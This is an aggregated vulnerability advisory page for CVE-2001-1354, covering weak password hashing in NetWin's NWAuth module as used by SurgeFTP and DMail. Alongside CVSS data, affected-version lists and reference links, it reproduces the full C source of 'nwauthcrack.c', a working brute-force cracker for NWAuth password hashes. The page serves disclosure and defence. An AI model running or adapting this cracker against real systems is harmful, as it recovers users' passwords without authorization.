CVE-2001-1354
CVSS 4.6
Published: 2001-07-20 00:00:00
Last modified: 2008-09-05 16:26:20

[Original] NetWin Authentication module (NWAuth) 2.0 and 3.0b, as implemented in SurgeFTP, DMail, and possibly other packages, uses weak password hashing, which could allow local users to decrypt passwords or use a different password that has the same hash value as the correct password.


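[CNNVD] Netwin NWAuth Weak Password Encryption Vulnerability (CNNVD-200107-131)

        CVE(CAN) ID: CAN-2001-1354

        NWAuth is Netwin's external authentication module, used by several Netwin products.

        NWAuth uses a simple one-way hash function to encrypt passwords, so an attacker can easily decrypt them.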

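- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]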

- CPE (Affected Platforms and Products)

cpe:/a:netwin:dmail:2.7
cpe:/a:netwin:dmail:2.8g
cpe:/a:netwin:dmail:2.5d
cpe:/a:netwin:dmail:2.8f
cpe:/a:netwin:dmail:2.8e
cpe:/a:netwin:dmail:2.7q
cpe:/a:netwin:surgeftp:1.0b
cpe:/a:netwin:dmail:2.8h
cpe:/a:netwin:dmail:2.7r
cpe:/a:netwin:dmail:2.8i
cpe:/a:netwin:surgeftp:2.0b
cpe:/a:netwin:surgeftp:2.0a

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1354
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1354
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-131
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/static/6866.php
(VENDOR_ADVISORY)  XF  netwin-nwauth-weak-encryption(6866)
http://www.securityfocus.com/bid/3075
(VENDOR_ADVISORY)  BID  3075
http://online.securityfocus.com/archive/1/198293
(VENDOR_ADVISORY)  BUGTRAQ  20010720 NetWin Authentication Module 3.0b password storage vulnerabilities / buffer overflows

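- Vulnerability Information

Netwin NWAuth Weak Password Encryption Vulnerability
Medium risk  Design error
2001-07-20 00:00:00 2005-10-20 00:00:00
Local
        CVE(CAN) ID: CAN-2001-1354

        NWAuth is Netwin's external authentication module, used by several Netwin products.

        NWAuth uses a simple one-way hash function to encrypt passwords, so an attacker can easily decrypt them.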

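- Advisories and Patches

        Vendor patch:

        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

        http://netwinsite.com/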

        

- Vulnerability Information (21020)

NetWin DMail 2.x, SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability (EDBID:21020)
multiple local
2001-07-20 Verified
0 byterage
N/A
source: http://www.securityfocus.com/bid/3075/info

The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.

A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme. 

/********************************************************************
 * nwauthcrack.c - NetWin Authentication Module password cracker    *
 * the SurgeFTP encrypted passwords can be found in the admin.dat & *
 * nwauth.clg files in the nwauth.exe directory                     *
 * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
 ********************************************************************/

#include <string.h>
#include <stdio.h>

FILE *fh;
/* the following table indices refer to the characters our
   generated password may consist of (true/false), since
   we don't want to go into too much trouble when typing
   everything in :) */
const char okaychars[256] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};

/* DECRYPTION ALGORITHMS */
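int enumpwds(unsigned char encrypted[]) {
  int heavycrypt0;
  unsigned int num=0, i, x;
  size_t len = strlen((const char *)encrypted);
  unsigned char j[256], decrypted[256];
  /* j[i] is the lowest candidate character still to be tried at position i */
  for(i=0; i<256;i++) { j[i] = 0; }
brute:
  /* the first two bytes of the stored value seed the running state */
  heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
  for(i=0; i+2 < len; i++) {
    for(x=j[i]; x < 256; x++) {
      /* each stored byte only keeps (x * (state+1)) % 40, so several
         characters can produce the same byte */
      if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) && okaychars[x]) {
        decrypted[i] = x;
        break;
      }
    }
    if (x == 256) {
      /* no candidate fits at position i: backtrack to the previous position */
next:
      if (i == 0) return num;
      if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
      for (i=x; i < 256; i++) { j[i] = 0; }
      goto brute;
    }
    heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
  }
  decrypted[i] = '\x00';
  num++;
  printf("%s\n", (char *)decrypted);
  if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
  for (i=x; i < 256; i++) { j[i] = 0; }
  goto brute;
}
/* DECRYPTION ALGORITHMS END */

int main(int argc, char ** argv) {
  size_t len;

  printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");

  if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return 1; }
  /* enumpwds() reads two seed bytes plus at least one data byte and
     indexes 256-byte work buffers, so reject anything outside that range */
  len = strlen(argv[1]);
  if (len < 3 || len > 257) { printf("Input must be 3 to 257 characters long\n"); return 1; }
  printf("%s ->\n",argv[1]);

  printf("\n%d passwords found for %s\n",enumpwds((unsigned char *)argv[1]),argv[1]);
  return 0;
}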
		

- Vulnerability Information

5559
NetWin Authentication Module Weak Password Encryption
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

NetWin's NWAuth authentication module contains a flaw that may lead to an unauthorized password exposure. It is possible for a local user to gain access to plaintext passwords using brute force techniques, and it is possible for several passwords to match a given hash, which may lead to a loss of confidentiality.

- Timeline

2001-07-20 Unknown
2001-07-20 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability Author

- Vulnerability Information

Netwin NWAuth Weak Password Encryption Vulnerability
Design Error 3075
No No
2001-07-20 12:00:00 2009-07-11 06:56:00
Reported to Bugtraq by ByteRage <byterage@yahoo.com> on July 20, 2001.

- Affected Versions

NetWin SurgeFTP 2.0 b
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin SurgeFTP 2.0 a
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin SurgeFTP 1.0 b
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Slackware Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin DMail 2.8 i
NetWin DMail 2.8 h
NetWin DMail 2.8 g
NetWin DMail 2.8 f
NetWin DMail 2.8 e
NetWin DMail 2.7 r
NetWin DMail 2.7 q
NetWin DMail 2.7
NetWin DMail 2.5 d
- Apple Mac OS 9 9.0
- BSDI BSD/OS 4.0.1
- Digital OSF/1 3.2
- FreeBSD FreeBSD 5.0
- HP HP-UX 11.0 4
- IBM AIX 4.3.2
- Linux kernel 2.2 .x
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc

- Vulnerability Discussion

The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.

A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme.

- Exploit

This brute force password cracker was submitted by ByteRage <byterage@yahoo.com>:

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References